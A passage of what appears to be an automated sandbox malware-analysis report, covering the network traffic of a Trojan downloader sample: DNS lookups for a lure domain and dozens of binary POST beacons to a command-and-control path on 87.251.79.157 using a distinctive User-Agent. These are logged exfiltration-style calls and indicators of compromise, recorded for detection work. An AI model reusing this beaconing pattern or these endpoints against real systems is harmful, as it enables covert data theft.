                                              Mar 15, 2021 20:00:49.728863001 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.728945017 CET49692443192.168.2.5172.67.197.219
                                              Mar 15, 2021 20:00:49.730045080 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.730086088 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.730151892 CET49692443192.168.2.5172.67.197.219
                                              Mar 15, 2021 20:00:49.731267929 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.731287003 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.731388092 CET49692443192.168.2.5172.67.197.219
                                              Mar 15, 2021 20:00:49.763952017 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.763977051 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.764108896 CET49692443192.168.2.5172.67.197.219
                                              Mar 15, 2021 20:00:49.764483929 CET44349692172.67.197.219192.168.2.5
                                              Mar 15, 2021 20:00:49.764501095 CET44349692172.67.197.219192.168.2.5

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Mar 15, 2021 20:00:34.677200079 CET5758753192.168.2.58.8.8.8
                                              Mar 15, 2021 20:00:34.726097107 CET53575878.8.8.8192.168.2.5
                                              Mar 15, 2021 20:00:37.837224960 CET5543253192.168.2.58.8.8.8
                                              Mar 15, 2021 20:00:37.899475098 CET53554328.8.8.8192.168.2.5
                                              Mar 15, 2021 20:00:39.049635887 CET6493653192.168.2.58.8.8.8
                                              Mar 15, 2021 20:00:39.107146978 CET53649368.8.8.8192.168.2.5
                                              Mar 15, 2021 20:00:40.294750929 CET5270453192.168.2.58.8.8.8
                                              Mar 15, 2021 20:00:40.346502066 CET53527048.8.8.8192.168.2.5
                                              Mar 15, 2021 20:00:41.427320957 CET5221253192.168.2.58.8.8.8
                                              Mar 15, 2021 20:00:41.476124048 CET53522128.8.8.8192.168.2.5
                                              Mar 15, 2021 20:00:42.585253954 CET5430253192.168.2.58.8.8.8
                                              Mar 15, 2021 20:00:42.634099007 CET53543028.8.8.8192.168.2.5
                                              Mar 15, 2021 20:00:43.836338043 CET5378453192.168.2.58.8.8.8
                                              Mar 15, 2021 20:00:43.888134003 CET53537848.8.8.8192.168.2.5
                                              Mar 15, 2021 20:00:45.193048954 CET6530753192.168.2.58.8.8.8
                                              Mar 15, 2021 20:00:45.241710901 CET53653078.8.8.8192.168.2.5
                                              Mar 15, 2021 20:00:46.026055098 CET6434453192.168.2.58.8.8.8
                                              Mar 15, 2021 20:00:46.086394072 CET53643448.8.8.8192.168.2.5
                                              Mar 15, 2021 20:00:48.640778065 CET6206053192.168.2.58.8.8.8
                                              Mar 15, 2021 20:00:48.692806959 CET53620608.8.8.8192.168.2.5
                                              Mar 15, 2021 20:00:48.898298979 CET6180553192.168.2.58.8.8.8
                                              Mar 15, 2021 20:00:48.957503080 CET53618058.8.8.8192.168.2.5
                                              Mar 15, 2021 20:00:57.565490007 CET5479553192.168.2.58.8.8.8
                                              Mar 15, 2021 20:00:57.639827967 CET53547958.8.8.8192.168.2.5
                                              Mar 15, 2021 20:01:09.980295897 CET4955753192.168.2.58.8.8.8
                                              Mar 15, 2021 20:01:10.031935930 CET53495578.8.8.8192.168.2.5

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              Mar 15, 2021 20:00:48.640778065 CET192.168.2.58.8.8.80x2b53Standard query (0)liverpooldabestteamoftheworld.comA (IP address)IN (0x0001)
                                              Mar 15, 2021 20:00:48.898298979 CET192.168.2.58.8.8.80xbfbeStandard query (0)liverpooldabestteamoftheworld.comA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              Mar 15, 2021 20:00:48.692806959 CET8.8.8.8192.168.2.50x2b53No error (0)liverpooldabestteamoftheworld.com172.67.197.219A (IP address)IN (0x0001)
                                              Mar 15, 2021 20:00:48.692806959 CET8.8.8.8192.168.2.50x2b53No error (0)liverpooldabestteamoftheworld.com104.21.52.98A (IP address)IN (0x0001)
                                              Mar 15, 2021 20:00:48.957503080 CET8.8.8.8192.168.2.50xbfbeNo error (0)liverpooldabestteamoftheworld.com172.67.197.219A (IP address)IN (0x0001)
                                              Mar 15, 2021 20:00:48.957503080 CET8.8.8.8192.168.2.50xbfbeNo error (0)liverpooldabestteamoftheworld.com104.21.52.98A (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • liverpooldabestteamoftheworld.com
                                              • 87.251.79.157

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.549691172.67.197.21980C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:00:48.773063898 CET289OUTGET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-0E44846E8DBE171CF83840F8DBF160DC.html HTTP/1.1
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                              Host: liverpooldabestteamoftheworld.com
                                              Connection: Keep-Alive
                                              Mar 15, 2021 20:00:48.883388996 CET290INHTTP/1.1 301 Moved Permanently
                                              Date: Mon, 15 Mar 2021 19:00:48 GMT
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Cache-Control: max-age=3600
                                              Expires: Mon, 15 Mar 2021 20:00:48 GMT
                                              Location: https://liverpooldabestteamoftheworld.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-0E44846E8DBE171CF83840F8DBF160DC.html
                                              cf-request-id: 08d8dc362d00002d1fd7b59000000001
                                              Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Y5u39yhLVT6B3hK9UpdkkiTmNrW2jcGYb%2FRiFF%2FyJ%2Bwq%2F19s%2FRFdow0Sq4pj6bguojspKZszWn7HPTnaKnw83ItNiwuOda6KPh5XUo6xxtDICWuOJVly2IGTAc7udn04XaY%3D"}]}
                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 6307fc9d09112d1f-LHR
                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                              Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.2.54969687.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:00:59.299750090 CET1132OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 192
                                              Connection: close
                                              Mar 15, 2021 20:00:59.613749027 CET1133INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:00:59 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 15
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              10192.168.2.54970687.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:10.247131109 CET1145OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:10.543725967 CET1150INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:10 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              100192.168.2.54979687.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              101192.168.2.54979787.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              102192.168.2.54979887.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              103192.168.2.54979987.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              104192.168.2.54980087.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              105192.168.2.54980187.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              106192.168.2.54980287.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              107192.168.2.54980387.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              108192.168.2.54980487.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              109192.168.2.54980587.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              11192.168.2.54970787.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:10.814029932 CET1154OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:11.073518991 CET1157INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:10 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              110192.168.2.54980687.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              111192.168.2.54980787.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              112192.168.2.54980887.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              113192.168.2.54980987.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              114192.168.2.54981087.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              115192.168.2.54981187.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              116192.168.2.54981287.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              117192.168.2.54981387.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              118192.168.2.54981487.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              119192.168.2.54981587.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              12192.168.2.54970887.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:11.333466053 CET1158OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:11.586393118 CET1159INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:11 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              120192.168.2.54981687.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              121192.168.2.54981787.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              122192.168.2.54981887.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              123192.168.2.54981987.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              124192.168.2.54982087.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              125192.168.2.54982187.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              126192.168.2.54982287.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              127192.168.2.54982387.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              128192.168.2.54982487.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              129192.168.2.54982587.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              13192.168.2.54970987.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:11.848732948 CET1160OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:12.111887932 CET1161INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:11 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              130192.168.2.54982687.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              14192.168.2.54971087.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:12.375236988 CET1161OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:12.661370993 CET1162INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:12 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              15192.168.2.54971187.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:12.929996967 CET1163OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:13.460848093 CET1163INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:12 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              16192.168.2.54971287.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:13.736500025 CET1164OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:14.088730097 CET1165INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:13 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              17192.168.2.54971387.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:14.345824003 CET1165OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:14.636305094 CET1166INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:14 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              18192.168.2.54971487.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:14.911689997 CET1167OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:15.317789078 CET1167INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:14 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              19192.168.2.54971587.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:15.558859110 CET1168OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:15.838732958 CET1169INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:15 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              2192.168.2.54969787.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:00:59.912760019 CET1134OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 192
                                              Connection: close
                                              Mar 15, 2021 20:01:00.844660997 CET1134INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:00:59 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 15
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              20192.168.2.54971687.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:16.089930058 CET1169OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:16.392034054 CET1170INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:16 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              21192.168.2.54971787.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:16.657505989 CET1171OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:16.946177006 CET1171INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:16 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              22192.168.2.54971887.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:17.197165012 CET1172OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
